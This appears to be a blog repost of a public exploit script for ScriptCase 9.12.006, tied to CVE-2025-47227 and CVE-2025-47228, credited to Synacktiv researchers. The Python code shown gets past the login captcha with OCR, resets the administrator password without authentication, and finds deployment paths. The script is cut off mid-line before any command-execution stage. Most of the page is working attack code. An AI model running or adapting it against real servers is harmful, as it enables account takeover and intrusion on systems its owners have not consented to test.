July 8, 2025

ScriptCase 9.12.006 (23) – Remote Command Execution (RCE)

Author09 mins 


# Exploit Title: ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)
# Date: 04/07/2025
# Exploit Author: Alexandre ZANNI (noraj) & Alexandre DROULLÉ (cabir)
# Vendor Homepage: https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 1.0.003-build-2 (Production Environment) / 9.12.006 (23) (ScriptCase)
# Tested on: EndeavourOS
# CVE : CVE-2025-47227, CVE-2025-47228
# Source: https://github.com/synacktiv/CVE-2025-47227_CVE-2025-47228
# Advisory: https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution

# Imports
## stdlib
import io
import random
import optparse
import re
import string
import sys
import urllib.parse
## third party
from PIL import Image, ImageEnhance, ImageFilter # pip3 install Pillow
import pytesseract # pip3 install pytesseract
import requests # pip install requests
from bs4 import BeautifulSoup # pip install beautifulsoup4

# Clean image + OCR
def process_image(input_image, output_image_path=None):
    # Open the image
    img = Image.open(io.BytesIO(input_image))
    
    # Convert the image to RGB (in case it's in a different mode)
    img = img.convert('RGB')
    
    # Load the pixel data
    pixels = img.load()

    # Get the dimensions of the image
    width, height = img.size

    # Process each pixel
    for y in range(height):
        for x in range(width):
            r, g, b = pixels[x, y]
            # Change the crap background to a fixed color (letters are only black or white, and background is random color but not black or white)
            if (r, g, b) != (0, 0, 0) and (r, g, b) != (255, 255, 255):
                pixels[x, y] = (211, 211, 211) # Change the pixel to light grey
            elif (r, g, b) == (255, 255, 255): # Change white text in black text
                pixels[x, y] = (0, 0, 0) # Change the pixel to black

    # Size (200, 50) * 5
    img = img.resize((1000,250), Image.Resampling.HAMMING)

    # Use Tesseract to convert the image to text
    # psm 6 or 8 work best
    # limit alphabet
    # disable word optimized detection https://github.com/tesseract-ocr/tessdoc/blob/main/ImproveQuality.md#dictionaries-word-lists-and-patterns
    custom_oem_psm_config = rf'--psm 8 --oem 3 -c tessedit_char_whitelist={string.ascii_letters} -c load_system_dawg=false -c load_freq_dawg=false --dpi 300' # there are only uppercase but keep lowercase to avoid false negative
    text = pytesseract.image_to_string(img, config=custom_oem_psm_config)
    return(text.upper().strip()) # convert false positive lowercase to uppercase, strip because leading whitespace is often added

# Step 1: Set is_page to true on the session
def prepare_session(url_base, cookies):
    res = requests.get(
        f'{url_base}/prod/lib/php/devel/iface/login.php',
        cookies=cookies,
        verify=False
    )
    if res.status_code == 200:
        print("[+] Session prepared")
    else:
        print(f"[-] Failed with status code {res.status_code}")

# Random hex string of arbitrary size
def rand_hex(size):
    return ''.join(random.choice('0123456789abcdef') for _ in range(size))

# Step 2: Get a captcha challenge for the session
def captcha_session(url_base, cookies):
    res = requests.get(
        f'{url_base}/prod/lib/php/devel/lib/php/secureimage.php',
        cookies=cookies,
        verify=False
    )
    if res.status_code == 200:
        print("[+] Captcha retrieved")
        return res.content
    else:
        print(f"[-] Failed with status code {res.status_code}")

# Step 3: Change the password with the prepared session
def reset_password(url_base, cookies, captcha_img, captcha_txt):
    new_password = random.choice(string.ascii_letters).capitalize() + rand_hex(10) + str(random.randint(0,9))
    email = f'{rand_hex(10)}@{rand_hex(8)}.com'
    data = {
        'ajax': 'nm',
        'nm_action': 'change_pass',
        'email': email,
        'pass_new': new_password,
        'pass_conf': new_password,
        'lang': 'en-us',
        'captcha': captcha_txt
    }
    res = requests.post(
        f'{url_base}/prod/lib/php/devel/iface/login.php',
        data=data,
        cookies=cookies,
        verify=False
    )
    if res.status_code == 200 and res.text == '{"result":"success"}':
        print("[+] Password reset successfully")
        print(f"[+] The new password is: {new_password}")
        print(f"[+] The delcared (fake) email address was: {email}")
    elif res.status_code == 200 and res.text == '{"result":"error","message":"Invalid captcha"}':
        print("[-] OCR failed")
        print(f"[-] Failed captcha submission was {captcha_txt}")
        img = Image.open(io.BytesIO(captcha_img))
        img.show()
        manual_input = input("[+] Input displayed captcha to retry manually: ")
        reset_password(url_base, cookies, captcha_img, manual_input)
    elif res.status_code == 200 and res.text == '{"result":"error","message":"The password is incorrect."}':
        print("[-] Non default password policy")
        print("[-] Hardcode a password that matches it")
        print(f"[-] Failed password is: {new_password}")
    else:
        print(f"[-] Failed with status code {res.status_code}")
        print(res.text)
        print('[-] Data was:')
        print(data)

# Detect the deployment path of ScriptCase and produciton environment from the homepage.
# E.g. deployment path is /scriptcase/
# sc_pathToTB variable on http://10.58.8.213/ will be '/scriptcase/prod/third/jquery_plugin/thickbox/'
# ScriptCase login page => http://10.58.8.213/scriptcase/devel/iface/login.php
# Production Environment login page => http://10.58.8.213/scriptcase/prod/lib/php/devel/iface/login.php
def detect_deployment_path(homepage_url):
    res = requests.get(homepage_url, verify=False) # HTTP redirections are handled automatically (not JS redirects)
    if res.status_code == 200:
        print("[+] Looking for deployment path in JS and computing login paths")
        reg = r"var sc_pathToTB = '(.+)/prod/third/jquery_plugin/thickbox/';"
        match = re.search(reg, res.text)
        # compute URL without path
        parsed_url = urllib.parse.urlparse(homepage_url)
        homepage_root = f"{parsed_url.scheme}://{parsed_url.netloc}"
        if match:
            base_path = match.group(1)
            print(f"[+] Deployment path found: {base_path}/")
            print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php (probably not deployed on a production environment)")
            print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php")
        else: # either a website not made with ScriptCase or root redirects to the devel page
            js_redirect(res)
            # try to detect the devel/iface/login.php page
            reg2 = r'http://www\.scriptcase\.net|doChangeLanguage|str_lang_user_first'
            match = re.search(reg2, res.text)
            if match: # devel page
                print(f"[?] This may be the development console?")
                # now try to extract path from favicon
                reg3 = r'



Source link

Leave a Reply

Your email address will not be published. Required fields are marked *

Related News